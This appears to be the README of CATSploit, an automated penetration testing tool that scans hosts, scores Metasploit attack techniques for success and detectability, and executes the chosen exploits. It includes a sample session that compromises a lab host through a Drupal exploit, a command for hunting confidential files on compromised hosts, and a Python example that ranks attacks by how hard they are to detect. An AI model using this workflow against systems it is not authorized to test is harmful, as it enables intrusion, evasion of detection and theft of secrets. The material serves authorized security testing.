CATSploit is an automated penetration testing tool based on the Cyber Attack Techniques Scoring (CATS) method, which lets it be used without a pentester. Today, pentesters implicitly select the attack techniques that suit the target system. CATSploit instead takes the system configuration information collected by a scanner (OS, open ports, software versions) and calculates, for each attack technique, a capture score eVc and a detectability score eVd against that target. By selecting the highest score values, the most appropriate attack technique for the target system can be chosen without the hack knack (a professional pentester's skill).
CATSploit automatically performs a penetration test in the following sequence:
1. Information gathering and prior information input: first, gather information about the target systems. CATSploit supports nmap and OpenVAS for this, and also accepts prior information about the target systems if you have it.
2. Calculating score values of attack techniques: using the information obtained in the previous phase and the attack techniques database, the evaluation values for capture (eVc) and detectability (eVd) of each attack technique are calculated. The values are calculated per target computer, for every attack technique.
3. Selecting attack techniques by score and building an attack scenario: attack techniques are selected and attack scenarios created according to pre-defined policies. For example, under a policy that prioritizes being hard to detect, the attack techniques with the lowest eVd (detectability score) are selected.
4. Executing the attack scenario: CATSploit executes the attack techniques according to the attack scenario constructed in the previous phase. It uses Metasploit as its framework and the Metasploit API to execute the actual attacks.
CATSploit has the following prerequisites:
Metasploit, Nmap and OpenVAS are assumed to be installed as part of the Kali distribution.
To install the latest version of CATSploit, please use the following commands:
$ git clone https://github.com/catsploit/catsploit.git
$ cd catsploit
$ git clone https://github.com/catsploit/cats-helper.git
$ sudo ./setup.sh
CATSploit uses a server-client configuration; the server reads a configuration JSON file at startup. In config.json, the following fields should be modified for your environment.
(*) Adjust the number according to the specs of your machine.
To start the server, execute the following command:
$ python cats_server.py -c [CONFIG_FILE]
Next, prepare another console, start the client program, and initiate a connection to the server.
$ python catsploit.py -s [SOCKET_PATH]
After successfully connecting to the server and initializing it, the session will start.
   _________  ___________       __      _ __
  / ____/   |/_  __/ ___/____  / /___  (_) /_
 / /   / /| | / /  \__ \/ __ \/ / __ \/ / __/
/ /___/ ___ |/ /  ___/ / /_/ / / /_/ / / /_
\____/_/  |_/_/  /____/ .___/_/\____/_/\__/
                     /_/
[*] Connecting to cats-server
[*] Done.
[*] Initializing server
[*] Done.
catsploit>
The client can execute a variety of commands. Each command can be executed with -h option to display the format of its arguments.
usage: [-h] {host,scenario,scan,plan,attack,post,reset,help,exit} ...
positional arguments:
  {host,scenario,scan,plan,attack,post,reset,help,exit}
options:
  -h, --help       show this help message and exit 
I've posted the commands and options below as well for reference.
host list:
 show information about the hosts
 usage:  host list [-h] 
 options:
  -h, --help       show this help message and exit
host detail:
 show more information about one host
 usage:  host detail [-h] host_id 
 positional arguments:
  host_id          ID of the host for which you want to show information
 options:
  -h, --help       show this help message and exit
scenario list:
 show information about the scenarios
 usage:  scenario list [-h]
 options:
  -h, --help       show this help message and exit
scenario detail:
 show more information about one scenario
 usage:  scenario detail [-h] scenario_id
 positional arguments:
  scenario_id      ID of the scenario for which you want to show information
 options:
  -h, --help       show this help message and exit
scan:
 run network-scan and security-scan
 usage:  scan [-h] [--port PORT] target_host [target_host ...]
 positional arguments:
  target_host      IP address to be scanned
 options:
  -h, --help       show this help message and exit
  --port PORT      ports to be scanned
plan:
 planning attack scenarios
 usage:  plan [-h] src_host_id dst_host_id
 positional arguments:
  src_host_id      originating host
  dst_host_id      target host
 options:
  -h, --help       show this help message and exit
attack:
 execute attack scenario
 usage:  attack [-h] scenario_id
 positional arguments:
  scenario_id      ID of the scenario you want to execute
 options:
  -h, --help       show this help message and exit
post find-secret:
 find confidential information files that can be performed on the pwned host
 usage:  post find-secret [-h] host_id
 positional arguments:
  host_id          ID of the host for which you want to find confidential information
 options:
  -h, --help       show this help message and exit
reset:
 reset data on the server
 usage:  reset [-h] {system} ...
 positional arguments:
  {system}         reset system
 options:
  -h, --help       show this help message and exit
exit:
 exit CATSploit
 usage:  exit [-h]
 options:
  -h, --help       show this help message and exit
In this example, we use CATSploit to scan the network, plan an attack scenario, and execute the attack.
catsploit> scan 192.168.0.0/24
Network Scanning ... 100%
[*] Total 2 hosts were discovered.
Vulnerability Scanning ... 100%
[*] Total 14 vulnerabilities were discovered.
catsploit> host list
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━┓
┃ hostID   ┃ IP             ┃ Hostname ┃ Platform                         ┃ Pwned ┃
┡━━━━━━━━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━┩
│ attacker │ 0.0.0.0        │ kali     │ kali 2022.4                      │ True  │
│ h_exbiy6 │ 192.168.0.10   │          │ Linux 3.10 - 4.11                │ False │
│ h_nhqyfq │ 192.168.0.20   │          │ Microsoft Windows 7 SP1          │ False │
└──────────┴────────────────┴──────────┴──────────────────────────────────┴───────┘
catsploit> host detail h_exbiy6
┏━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━┓
┃ hostID   ┃ IP           ┃ Hostname ┃ Platform     ┃ Pwned ┃
┡━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━┩
│ h_exbiy6 │ 192.168.0.10 │ ubuntu   │ ubuntu 14.04 │ False │
└──────────┴──────────────┴──────────┴──────────────┴───────┘
[IP address]
┏━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━┳━━━━━━━━━━━━┓
┃ ipv4         ┃ ipv4mask ┃ ipv6 ┃ ipv6prefix ┃
┡━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━╇━━━━━━━━━━━━┩
│ 192.168.0.10 │          │      │            │
└──────────────┴──────────┴──────┴────────────┘
[Open ports]
┏━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ ip           ┃ proto ┃ port ┃ service     ┃ product      ┃ version                    ┃
┡━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│ 192.168.0.10 │ tcp   │ 21   │ ftp         │ ProFTPD      │ 1.3.5                      │
│ 192.168.0.10 │ tcp   │ 22   │ ssh         │ OpenSSH      │ 6.6.1p1 Ubuntu 2ubuntu2.10 │
│ 192.168.0.10 │ tcp   │ 80   │ http        │ Apache httpd │ 2.4.7                      │
│ 192.168.0.10 │ tcp   │ 445  │ netbios-ssn │ Samba smbd   │ 3.X - 4.X                  │
│ 192.168.0.10 │ tcp   │ 631  │ ipp         │ CUPS         │ 1.7                        │
└──────────────┴───────┴──────┴─────────────┴──────────────┴────────────────────────────┘
[Vulnerabilities]
┏━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┓
┃ ip           ┃ proto ┃ port ┃ vuln_name                                                           ┃ cve            ┃
┡━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━┩
│ 192.168.0.10 │ tcp   │ 0    │ TCP Timestamps Information Disclosure                               │ N/A            │
│ 192.168.0.10 │ tcp   │ 21   │ FTP Unencrypted Cleartext Login                                     │ N/A            │
│ 192.168.0.10 │ tcp   │ 22   │ Weak MAC Algorithm(s) Supported (SSH)                               │ N/A            │
│ 192.168.0.10 │ tcp   │ 22   │ Weak Encryption Algorithm(s) Supported (SSH)                        │ N/A            │
│ 192.168.0.10 │ tcp   │ 22   │ Weak Host Key Algorithm(s) (SSH)                                    │ N/A            │
│ 192.168.0.10 │ tcp   │ 22   │ Weak Key Exchange (KEX) Algorithm(s) Supported (SSH)                │ N/A            │
│ 192.168.0.10 │ tcp   │ 80   │ Test HTTP dangerous methods                                         │ N/A            │
│ 192.168.0.10 │ tcp   │ 80   │ Drupal Core SQLi Vulnerability (SA-CORE-2014-005) - Active Check    │ CVE-2014-3704  │
│ 192.168.0.10 │ tcp   │ 80   │ Drupal Coder RCE Vulnerability (SA-CONTRIB-2016-039) - Active Check │ N/A            │
│ 192.168.0.10 │ tcp   │ 80   │ Sensitive File Disclosure (HTTP)                                    │ N/A            │
│ 192.168.0.10 │ tcp   │ 80   │ Unprotected Web App / Device Installers (HTTP)                      │ N/A            │
│ 192.168.0.10 │ tcp   │ 80   │ Cleartext Transmission of Sensitive Information via HTTP            │ N/A            │
│ 192.168.0.10 │ tcp   │ 80   │ jQuery < 1.9.0 XSS Vulnerability                                    │ CVE-2012-6708  │
│ 192.168.0.10 │ tcp   │ 80   │ jQuery < 1.6.3 XSS Vulnerability                                    │ CVE-2011-4969  │
│ 192.168.0.10 │ tcp   │ 80   │ Drupal 7.0 Information Disclosure Vulnerability - Active Check      │ CVE-2011-3730  │
│ 192.168.0.10 │ tcp   │ 631  │ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS                  │ CVE-2016-2183  │
│ 192.168.0.10 │ tcp   │ 631  │ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS                  │ CVE-2016-6329  │
│ 192.168.0.10 │ tcp   │ 631  │ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS                  │ CVE-2020-12872 │
│ 192.168.0.10 │ tcp   │ 631  │ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection          │ CVE-2011-3389  │
│ 192.168.0.10 │ tcp   │ 631  │ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection          │ CVE-2015-0204  │
└──────────────┴───────┴──────┴─────────────────────────────────────────────────────────────────────┴────────────────┘
[Users]
┏━━━━━━━━━━━┳━━━━━━━┓
┃ user name ┃ group ┃
┡━━━━━━━━━━━╇━━━━━━━┩
└───────────┴───────┘
catsploit> plan attacker h_exbiy6
Planning attack scenario...100%
[*] Done. 15 scenarios was planned.
[*] To check each scenario, try 'scenario list' and/or 'scenario detail'.
catsploit> scenario list
┏━━━━━━━━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ scenario id ┃ src host ip ┃ target host ip ┃ eVc   ┃ eVd   ┃ steps ┃ first attack step             ┃
┡━━━━━━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│ 3d3ivc      │ 0.0.0.0     │ 192.168.0.10   │ 1.0   │ 32.0  │ 1     │ exploit/multi/http/jenkins_s… │
│ 5gnsvh      │ 0.0.0.0     │ 192.168.0.10   │ 1.0   │ 53.76 │ 2     │ exploit/multi/http/jenkins_s… │
│ 6nlxyc      │ 0.0.0.0     │ 192.168.0.10   │ 0.0   │ 48.32 │ 2     │ exploit/multi/http/jenkins_s… │
│ 8jos4z      │ 0.0.0.0     │ 192.168.0.10   │ 0.7   │ 72.8  │ 2     │ exploit/multi/http/jenkins_s… │
│ 8kmmts      │ 0.0.0.0     │ 192.168.0.10   │ 0.0   │ 32.0  │ 1     │ exploit/multi/elasticsearch/… │
│ agjmma      │ 0.0.0.0     │ 192.168.0.10   │ 0.0   │ 24.0  │ 1     │ exploit/windows/http/managee… │
│ joglhf      │ 0.0.0.0     │ 192.168.0.10   │ 70.0  │ 60.0  │ 1     │ auxiliary/scanner/ssh/ssh_lo… │
│ rmgrof      │ 0.0.0.0     │ 192.168.0.10   │ 100.0 │ 32.0  │ 1     │ exploit/multi/http/drupal_dr… │
│ xuowzk      │ 0.0.0.0     │ 192.168.0.10   │ 0.0   │ 24.0  │ 1     │ exploit/multi/http/struts_dm… │
│ yttv51      │ 0.0.0.0     │ 192.168.0.10   │ 0.01  │ 53.76 │ 2     │ exploit/multi/http/jenkins_s… │
│ znv76x      │ 0.0.0.0     │ 192.168.0.10   │ 0.01  │ 53.76 │ 2     │ exploit/multi/http/jenkins_s… │
└─────────────┴─────────────┴────────────────┴───────┴───────┴───────┴───────────────────────────────┘
catsploit> scenario detail rmgrof
┏━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┓
┃ src host ip ┃ target host ip ┃ eVc   ┃ eVd  ┃
┡━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━┩
│ 0.0.0.0     │ 192.168.0.10   │ 100.0 │ 32.0 │
└─────────────┴────────────────┴───────┴──────┘
[Steps]
┏━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━┓
┃ # ┃ step                                  ┃ params                ┃
┡━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━┩
│ 1 │ exploit/multi/http/drupal_drupageddon │ RHOSTS: 192.168.0.10  │
│   │                                       │ LHOST: 192.168.10.100 │
└───┴───────────────────────────────────────┴───────────────────────┘
catsploit> attack rmgrof
> ~
> ~
> Metasploit Console Log
> ~
> ~
[+] Attack scenario succeeded!
catsploit> exit
Bye.
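The selection rule from step 3 of the workflow (under a hard-to-detect policy, pick the lowest eVd), applied to the scores that `scenario list` printed in the session above. This is an added example and not CATSploit's own planner: the policy names, the tie-breaking and the `min_evc` filter are assumptions, and the table text is transcribed from the output above; a defender reviewing such a run can apply the same ranking to see which scenario the planner favours and where detection coverage matters most.

```python
# Added example (not CATSploit's planner): rank `scenario list` rows by policy.
from typing import NamedTuple

class Scenario(NamedTuple):
    sid: str
    evc: float       # capture score (eVc): chance the technique succeeds
    evd: float       # detectability score (eVd): chance the attempt is noticed
    steps: int
    first_step: str

def parse_scenario_list(text):
    """Parse the body rows (those starting with '│') of the printed table."""
    rows = []
    for line in text.splitlines():
        if not line.startswith("│"):
            continue                     # borders and the ┃ header row
        c = [x.strip() for x in line.strip("│").split("│")]
        rows.append(Scenario(c[0], float(c[3]), float(c[4]), int(c[5]), c[6]))
    return rows

# Policy -> sort key, best first. Ties fall back to the other score, then step
# count, then id (assumed tie-breaking; the page does not document CATSploit's).
POLICIES = {
    "hard_to_detect": lambda s: (s.evd, -s.evc, s.steps, s.sid),
    "high_success":   lambda s: (-s.evc, s.evd, s.steps, s.sid),
}

def select(scenarios, policy, min_evc=None):
    """Order best-first; with min_evc, drop rows whose eVc is at or below it
    (a hard-to-detect technique with eVc 0.0 still cannot capture the host)."""
    if min_evc is not None:
        scenarios = [s for s in scenarios if s.evc > min_evc]
    return sorted(scenarios, key=POLICIES[policy])

# Constructed input: the rows transcribed from the `scenario list` output above.
SCENARIO_LIST = """\
┃ scenario id ┃ src host ip ┃ target host ip ┃ eVc   ┃ eVd   ┃ steps ┃ first attack step             ┃
│ 3d3ivc      │ 0.0.0.0     │ 192.168.0.10   │ 1.0   │ 32.0  │ 1     │ exploit/multi/http/jenkins_s… │
│ 5gnsvh      │ 0.0.0.0     │ 192.168.0.10   │ 1.0   │ 53.76 │ 2     │ exploit/multi/http/jenkins_s… │
│ 6nlxyc      │ 0.0.0.0     │ 192.168.0.10   │ 0.0   │ 48.32 │ 2     │ exploit/multi/http/jenkins_s… │
│ 8jos4z      │ 0.0.0.0     │ 192.168.0.10   │ 0.7   │ 72.8  │ 2     │ exploit/multi/http/jenkins_s… │
│ 8kmmts      │ 0.0.0.0     │ 192.168.0.10   │ 0.0   │ 32.0  │ 1     │ exploit/multi/elasticsearch/… │
│ agjmma      │ 0.0.0.0     │ 192.168.0.10   │ 0.0   │ 24.0  │ 1     │ exploit/windows/http/managee… │
│ joglhf      │ 0.0.0.0     │ 192.168.0.10   │ 70.0  │ 60.0  │ 1     │ auxiliary/scanner/ssh/ssh_lo… │
│ rmgrof      │ 0.0.0.0     │ 192.168.0.10   │ 100.0 │ 32.0  │ 1     │ exploit/multi/http/drupal_dr… │
│ xuowzk      │ 0.0.0.0     │ 192.168.0.10   │ 0.0   │ 24.0  │ 1     │ exploit/multi/http/struts_dm… │
│ yttv51      │ 0.0.0.0     │ 192.168.0.10   │ 0.01  │ 53.76 │ 2     │ exploit/multi/http/jenkins_s… │
│ znv76x      │ 0.0.0.0     │ 192.168.0.10   │ 0.01  │ 53.76 │ 2     │ exploit/multi/http/jenkins_s… │
"""
```

Calling `select(parse_scenario_list(SCENARIO_LIST), "hard_to_detect", min_evc=0.0)` puts `rmgrof` first, the scenario the session above went on to execute; without the filter the eVc 0.0 rows `agjmma` and `xuowzk` rank first, which is why a detectability-only policy needs a capture floor.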
All information and code are provided solely for educational purposes and/or for testing your own systems.
For any inquiry, please contact the email address as follows:
catsploit@nk.MitsubishiElectric.co.jp